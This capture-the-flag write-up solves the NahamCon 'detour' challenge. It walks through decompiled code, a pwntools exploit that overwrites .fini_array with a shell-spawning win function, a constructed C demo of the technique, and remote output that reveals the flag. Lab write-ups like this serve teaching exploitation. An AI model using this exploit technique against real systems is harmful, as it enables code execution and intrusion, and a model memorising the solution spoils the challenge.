Tags: write-what-where pwn fini_array
Rating:
write-what-where as a service! Now how do I detour away from the intended path of execution?
Author: @M_alpha#3534
Tags: pwn x86-64 write-what-where
One-shot write-what-where to overwrite .fini_array with the win function.
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
No RELRO: every time, it's .fini_array. With no RELRO the array of exit handlers stays writable, so just overwrite .fini_array with the address of a win function if there is one (or grow your own).
undefined8 main(void)
{
    long in_FS_OFFSET;
    undefined8 local_20;   /* "what": the 8 bytes that get written */
    long local_18;         /* "where": a signed offset relative to the global base */
    long local_10;

    local_10 = *(long *)(in_FS_OFFSET + 0x28);   /* stack canary saved */
    printf("What: ");
    __isoc99_scanf(&DAT_00402013,&local_20);
    getchar();
    printf("Where: ");
    __isoc99_scanf(&DAT_0040201f,&local_18);
    getchar();
    /* one-shot write-what-where: *(base + where) = what, no bounds check */
    *(undefined8 *)((long)&base + local_18) = local_20;
    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {   /* canary check */
        __stack_chk_fail();
    }
    return 0;
}
The line `*(undefined8 *)((long)&base + local_18) = local_20;` is a write-what-where: local_20 is the what, local_18 is the where, and the where is an offset from the global base rather than an absolute address.
void win(void)
{
    system("/bin/sh");
    return;
}
And there's the win function.
#!/usr/bin/env python3
from pwn import *

binary = context.binary = ELF('./detour', checksec=False)

if args.REMOTE:
    p = remote('challenge.nahamcon.com', 32549)
else:
    p = process(binary.path)

# what: the address of win (no PIE, so it is fixed at 0x400000 + offset)
p.sendlineafter(b'What: ', str(binary.sym.win).encode())
# where: .fini_array relative to base, since main adds base to the offset
p.sendlineafter(b'Where: ', str(binary.get_section_by_name('.fini_array').header.sh_addr - binary.sym.base).encode())
p.interactive()
Overwrite .fini_array with the address of the function win. The where value has to be the address of .fini_array minus the address of base (it may be negative, which is why it is sent as a signed decimal), because base is added to where in `*(undefined8 *)((long)&base + local_18) = local_20;`. When main returns, the loader walks .fini_array and calls win instead of the intended exit handler.
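To make the mechanism concrete without the challenge binary, here is an added example (not the challenge's or the author's code) that reproduces the three pieces in one self-contained C program: a global `base` as in detour, a table of function pointers `fake_fini_array` standing in for .fini_array (which `_dl_fini` walks at exit in the real binary, and which is only writable because RELRO is off), and the same one-shot primitive `*(base + where) = what`. The offset computation `&.fini_array - &base` is the same arithmetic the exploit script does with pwntools. `win`, `intended_fini`, `fini_ran` and the table are constructed for the demo; the store goes through `memcpy` so the type-punned write is well defined here, whereas the challenge does a raw 8-byte store.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed demo: a global that plays the role of detour's `base`, a
 * table of function pointers that stands in for .fini_array, and the
 * write-what-where primitive from the decompiled main. */

typedef void (*fini_fn)(void);

static int fini_ran;            /* records which exit handler ran (constructed) */

static void intended_fini(void) { fini_ran = 1; }
static void win(void)           { fini_ran = 2; /* system("/bin/sh") in the challenge */ }

long base;                                        /* stands in for detour's `base` symbol */
fini_fn fake_fini_array[1] = { intended_fini };   /* stands in for .fini_array */

/* The primitive from main: *(u64 *)((long)&base + where) = what.
 * memcpy instead of a raw deref only to keep the demo free of aliasing UB. */
static void write_what_where(uint64_t what, long where)
{
    memcpy((char *)&base + where, &what, sizeof what);
}

/* where = &.fini_array - &base. The result may be negative, which is why
 * the exploit sends a signed decimal for the "Where:" prompt. */
long fini_offset(void)
{
    return (long)((uintptr_t)fake_fini_array - (uintptr_t)&base);
}

/* The "exit path": call every table entry, as _dl_fini does for
 * .fini_array. Returns which handler ran (1 = intended, 2 = win). */
int run_fini(void)
{
    fini_ran = 0;
    for (size_t i = 0; i < sizeof fake_fini_array / sizeof fake_fini_array[0]; i++)
        fake_fini_array[i]();
    return fini_ran;
}

/* Detour: use the one write to drop win's address into the table, then
 * take the normal exit path, which now lands in win. */
int detour(void)
{
    write_what_where((uint64_t)(uintptr_t)win, fini_offset());
    return run_fini();
}

int main(void)
{
    printf("where = %ld (offset of the table from base)\n", fini_offset());
    printf("before overwrite: handler %d ran\n", run_fini());
    printf("after overwrite:  handler %d ran\n", detour());
    return 0;
}
```

The same check applies to the real target: if checksec reports Partial or Full RELRO, .fini_array is mapped read-only before main runs and the store faults, so this detour only works on a No RELRO binary like detour.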
Output:
# ./exploit.py REMOTE=1
[+] Opening connection to challenge.nahamcon.com on port 32549: Done
[*] Switching to interactive mode
$ cat flag.txt
flag{787325292ef650fa69541722bb57bed9}